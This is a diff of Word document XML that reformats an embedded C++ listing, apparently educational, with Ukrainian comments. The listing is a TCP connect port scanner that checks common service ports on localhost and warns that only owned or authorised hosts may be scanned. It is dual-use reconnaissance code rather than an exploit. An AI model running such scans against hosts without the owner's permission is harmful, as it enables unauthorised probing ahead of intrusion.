+              <w:t xml:space="preserve">        connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    closesocket(sock);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return opened;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    WSADATA wsa;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        return 1;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    int found = 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    for (int port : ports) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            ++found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found == 0) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    WSACleanup();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib (Linker → Input → Additional Dependencies).</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#else</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  using socket_t = int;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  #define closesocket close</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">struct ServiceName {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    int port;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    const char* name;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">};</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">};</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return "Unknown";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    // Обмежуємо час очікування, інакше сканування триватиме надто довго</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#else</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    bool opened = connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    closesocket(sock);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return opened;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">int main() {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    };</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    WSADATA wsa;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        return 1;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
